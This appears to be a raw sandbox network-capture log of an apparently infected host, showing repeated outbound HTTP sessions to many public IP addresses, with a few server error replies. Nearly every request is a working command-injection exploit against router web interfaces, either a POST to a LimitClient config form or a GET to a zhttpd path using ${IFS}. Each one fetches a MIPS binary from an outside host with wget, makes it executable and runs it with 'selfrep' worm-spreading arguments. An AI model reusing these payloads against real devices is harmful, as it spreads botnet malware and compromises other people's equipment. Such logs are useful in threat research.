                                                      Feb 2, 2024 06:35:53.386806011 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:53.503595114 CET328INHTTP/1.1 400 Bad Request
                                                      Server: cloudflare
                                                      Date: Fri, 02 Feb 2024 05:35:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      CF-RAY: -
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4428192.168.2.1450746206.214.93.1858080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.526391029 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:53.666073084 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Fri, 02 Feb 2024 13:42:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3181
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4429192.168.2.1439266118.216.160.1078080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.537343025 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:53.913816929 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:54.805763960 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:56.597701073 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:35:56.827601910 CET280INHTTP/1.0 400 Bad Request
                                                      Server: httpd
                                                      Date: Fri, 02 Feb 2024 05:35:56 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4430192.168.2.145825039.200.159.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630237103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4431192.168.2.1448536134.171.225.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630275965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4432192.168.2.144175078.28.37.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630299091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4433192.168.2.146070065.178.117.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630363941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4434192.168.2.1451416212.135.195.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630393982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4435192.168.2.145082666.224.104.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630434036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4436192.168.2.1436372132.49.206.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630461931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4437192.168.2.1451822175.119.64.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630501986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4438192.168.2.146084223.12.76.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630542994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4439192.168.2.145816019.57.125.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630585909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4440192.168.2.1442296145.171.63.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630611897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4441192.168.2.145928461.221.190.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630670071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4442192.168.2.143533064.245.232.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630716085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4443192.168.2.1459952218.37.138.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630758047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4444192.168.2.144621461.122.189.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630814075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4445192.168.2.146049013.47.197.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630831003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4446192.168.2.1443908163.226.5.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630883932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4447192.168.2.145470813.234.24.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630911112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4448192.168.2.1457916199.181.226.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630958080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4449192.168.2.1433696170.180.177.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.630980968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4450192.168.2.145250032.112.207.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631025076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4451192.168.2.143972898.119.223.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631066084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4452192.168.2.144355637.88.6.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631123066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4453192.168.2.1458836181.242.182.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631135941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4454192.168.2.1436562117.30.144.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631198883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4455192.168.2.1450410108.41.181.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631258965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4456192.168.2.1445566184.245.93.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631289005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4457192.168.2.1455678122.10.224.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631342888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4458192.168.2.1439814179.95.205.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631390095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4459192.168.2.1440798221.25.11.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631445885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4460192.168.2.1456910133.26.95.25443
